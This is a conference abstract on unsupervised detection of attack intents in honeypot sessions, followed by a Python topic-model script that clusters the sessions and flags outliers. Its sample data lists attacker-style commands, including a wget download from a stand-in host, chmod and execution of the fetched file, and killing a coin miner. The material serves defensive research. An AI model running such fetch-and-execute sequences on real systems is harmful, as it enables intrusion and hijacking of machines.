A0365
Title: Unsupervised attack pattern detection in cyber-security using topic modelling
Authors: Anastasia Mantziou - Imperial College London (United Kingdom) [presenting]
Francesco Sanna Passino - Imperial College London (United Kingdom)
Nick Heard - Imperial College London (United Kingdom)
Philip Thiede - Imperial College London (United Kingdom)
Ross Bevington - Microsoft (United Kingdom)
Abstract: Cyber systems are constantly under threat of intrusion attempts. Attacks are usually carried out with one underlying specific intent, or by groups of actors with similar objectives. Therefore, discovering such patterns is extremely valuable to threat experts. From a statistical point of view, this objective translates into a clustering task. The aim is to explore topic models for clustering session data collected on honeypots, hosts specifically designed to entice malicious intruders. The main practical implications of clustering the sessions are twofold: finding similar groups and identifying outliers. An array of methodologies is considered, suitably adapted to the challenges encountered with computer network data. In particular, the concepts of primary topics, session-level topics and command-level topics are introduced, along with a secondary topic for instructions representing common high-frequency commands. Furthermore, the proposed method is extended to allow for an unbounded number of latent intents. The methodologies are used to discover an unusual MIRAI variant which attempts to take over existing coin miner infrastructure.
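As an added illustration of the session-clustering idea described in the abstract (this is not the authors' model or code), the Python script below fits a deliberately small topic model to honeypot-style shell sessions: each session has one primary latent intent, and a shared secondary topic absorbs the boilerplate commands that appear in every session regardless of intent. The sampler starts with one candidate topic per session and lets sessions merge, so the number of occupied intents is inferred rather than fixed; this is a finite stand-in for the unbounded-intent extension the abstract mentions, not that extension itself. Sessions whose cluster stays a singleton are reported as outliers. The session contents, command strings, the example.invalid URL and the hyperparameter values are all constructed for this example.

```python
"""Clustering honeypot shell sessions with a small topic model (constructed example).

Each session has one primary latent intent; every command in it is emitted either
by that primary topic or by a shared secondary topic meant to absorb high-frequency
commands common to all intents (e.g. the "enable / system / shell / sh" preamble).
The sampler starts with one topic per session and merges sessions that share
commands, so the number of occupied intents is learned rather than fixed.
"""
import math
import random
from collections import Counter

ALPHA = 0.5    # Dirichlet prior on primary-topic proportions
BETA = 0.1     # Dirichlet prior on each topic's command distribution
LAMBDA = 0.3   # prior probability that a command is common boilerplate

# Constructed sample sessions (not real honeypot data): a preamble present in
# every session, commands specific to two intents, and one unusual session.
PREAMBLE = ["enable", "system", "shell", "sh"]
RECON = ["cat /proc/cpuinfo", "uname -a", "free -m", "nproc", "ls /tmp"]
MINER = ["pkill xmrig", "wget http://example.invalid/m", "chmod +x m", "./m", "crontab -l"]
SESSIONS = (
    [PREAMBLE + RECON[:4], PREAMBLE + RECON[1:],
     PREAMBLE + RECON[:3] + RECON[4:], PREAMBLE + RECON[:2] + RECON[3:]]
    + [PREAMBLE + MINER[:4], PREAMBLE + MINER[1:],
       PREAMBLE + MINER[:3] + MINER[4:], PREAMBLE + MINER[:2] + MINER[3:]]
    + [PREAMBLE + ["cat /etc/hostname", "df -h", "mount", "id"]]
)


def fit(sessions, iters=300, seed=7):
    """Collapsed Gibbs sampler: returns (z, sec, n_tw, k) with z[i] the primary topic
    of session i, sec[i][j] True for commands from the secondary topic (index k)."""
    rng = random.Random(seed)
    k = len(sessions)                              # one candidate topic per session
    vocab = len({c for s in sessions for c in s})
    z = list(range(k))
    sec = [[rng.random() < 0.5 for _ in s] for s in sessions]
    n_z = Counter(z)                               # sessions per primary topic
    n_tw = [Counter() for _ in range(k + 1)]       # topic -> command -> count
    n_t = [0] * (k + 1)                            # commands per topic

    def bump(t, c, d):                             # add d (+1/-1) to topic t's count of c
        n_tw[t][c] += d
        n_t[t] += d

    def word_p(t, c, extra_c=0, extra_t=0):        # predictive probability of c under t
        return (n_tw[t][c] + extra_c + BETA) / (n_t[t] + extra_t + BETA * vocab)

    for i, s in enumerate(sessions):
        for j, c in enumerate(s):
            bump(k if sec[i][j] else z[i], c, 1)

    for _ in range(iters):
        for i, s in enumerate(sessions):
            for j, c in enumerate(s):              # resample: boilerplate or intent-specific?
                bump(k if sec[i][j] else z[i], c, -1)
                p_sec = LAMBDA * word_p(k, c)
                p_pri = (1 - LAMBDA) * word_p(z[i], c)
                sec[i][j] = rng.random() * (p_sec + p_pri) < p_sec
                bump(k if sec[i][j] else z[i], c, 1)
            prim = [c for j, c in enumerate(s) if not sec[i][j]]
            n_z[z[i]] -= 1                         # detach the session, then resample its topic
            for c in prim:
                bump(z[i], c, -1)
            logw = []
            for t in range(k):
                lw = math.log(n_z[t] + ALPHA)
                seen = Counter()                   # Polya-urn product handles repeated commands
                for m, c in enumerate(prim):
                    lw += math.log(word_p(t, c, seen[c], m))
                    seen[c] += 1
                logw.append(lw)
            mx = max(logw)
            w = [math.exp(v - mx) for v in logw]
            r = rng.random() * sum(w)
            t = k - 1
            for cand, v in enumerate(w):
                r -= v
                if r <= 0:
                    t = cand
                    break
            z[i] = t
            n_z[t] += 1
            for c in prim:
                bump(t, c, 1)
    return z, sec, n_tw, k


def cluster_sessions(sessions, min_size=2, **kw):
    """Labels per session, indices of sessions in clusters smaller than min_size
    (outliers), and the commands the secondary topic absorbed most often."""
    z, _sec, n_tw, k = fit(sessions, **kw)
    sizes = Counter(z)
    outliers = [i for i, t in enumerate(z) if sizes[t] < min_size]
    return z, outliers, [c for c, _ in n_tw[k].most_common(5)]


if __name__ == "__main__":
    labels, outliers, common = cluster_sessions(SESSIONS)
    for i, (s, t) in enumerate(zip(SESSIONS, labels)):
        print(f"session {i}: intent {t}{' (outlier)' if i in outliers else ''}: {' ; '.join(s)}")
    print("secondary (common) topic:", common)
```

Running the script groups the four reconnaissance-style sessions into one intent and the four miner-takeover sessions into another, leaves the ninth session in a singleton cluster (reported as an outlier), and shows the preamble commands as the ones the secondary topic absorbed. Two design choices carry the security-relevant point: the secondary topic keeps boilerplate that every bot sends from dominating the similarity between sessions, and a fixed mixing weight (LAMBDA) rather than a learned one stops the secondary topic from swallowing intent-specific commands on such small data. Real honeypot sessions additionally need command normalisation (stripping random file names, IP addresses and ports) before they are treated as tokens.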